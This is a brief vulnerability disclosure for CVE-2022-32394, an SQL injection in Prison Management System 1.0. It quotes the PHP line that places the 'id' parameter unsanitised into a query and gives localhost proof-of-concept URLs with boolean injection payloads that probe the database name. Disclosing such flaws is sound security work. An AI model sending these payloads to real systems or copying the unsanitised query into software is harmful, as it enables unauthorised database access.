Skip to content

Latest commit

 

History

History
24 lines (22 loc) · 968 Bytes

cve-2022-32394.md

File metadata and controls

24 lines (22 loc) · 968 Bytes

CVE-2022-32394

Info

Prison Management System 1.0 - SQL Injection

[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET['id'] in /pms/admin/inmates/view_inmate.php:3

$qry = $conn->query("SELECT *,concat(lastname,', ', firstname, coalesce(concat(' ', middlename), '')) as `name` from `inmate_list` where id = '{$_GET['id']}' ");

PoC

  • Payload :
# Error Based
http://localhost/pms/admin/?page=inmates/view_inmate&id=1'-if(database()='pms_db',0,1)%23
  • True : http://localhost/pms/admin/?page=inmates/view_inmate&id=1'-if(database()='pms_db',0,1)%23 True
  • False : http://localhost/pms/admin/?page=inmates/view_inmate&id=1'-if(database()='wrong',0,1)%23 False